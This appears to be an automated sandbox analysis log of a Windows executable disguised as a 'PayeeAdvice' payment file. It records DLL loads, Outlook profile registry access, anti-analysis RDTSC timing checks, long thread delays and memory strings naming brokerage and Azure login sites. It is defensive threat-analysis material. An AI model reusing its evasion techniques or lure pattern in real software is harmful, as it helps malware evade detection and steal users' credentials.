            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation

            Source: Yara match | File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 5620, type: MEMORYSTR
            Source: Yara match | File source: 00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_00169C30 push esp; retf 0018h 4_2_00169D55
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | File created: C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI/Special instruction interceptor: Address: 859F5D4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI/Special instruction interceptor: Address: 69DF5D4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeRDTSC instruction interceptor: First address: 85408CB second address: 85408CB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD974CD8A53h 0x00000006 test ecx, ebx 0x00000008 inc ebp 0x00000009 test eax, 2C29B192h 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5FBFA3CCh 0x00000015 cmp esi, 33h 0x00000018 jl 00007FD974D3945Bh 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeRDTSC instruction interceptor: First address: 69808CB second address: 69808CB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD9756E0233h 0x00000006 test ecx, ebx 0x00000008 inc ebp 0x00000009 test eax, 2C29B192h 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5FBFA3CCh 0x00000015 cmp esi, 33h 0x00000018 jl 00007FD975740C3Bh 0x0000001e pop esi 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 37490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: 39490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598107Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597452Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597276Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597162Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595687Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595342Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594902Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594661Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeThread delayed: delay time: 594078Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeWindow / User API: threadDelayed 1496Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeWindow / User API: threadDelayed 8341Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI coverage: 1.7 %
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 7056 | Thread sleep count: 1496 > 30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 7056 | Thread sleep count: 8341 > 30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598107s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597452s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597276s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597162s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596266s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596141s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -596016s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595342s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595125s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594902s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594661s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594526s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594422s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594297s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594187s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5812 | Thread sleep time: -594078s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_0040622D FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 0_2_00402770 FindFirstFileW
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_00402770 FindFirstFileW
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Code function: 4_2_0040622D FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599344
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598891
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598219
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598107
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597891
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597452
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597276
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597162
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 597031
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596922
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596812
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596594
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596484
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596375
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596266
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596141
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 596016
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595797
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595342
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595234
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595125
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 595015
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594902
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594661
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594526
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594422
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594297
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594187
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe | Thread delayed: delay time: 594078
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
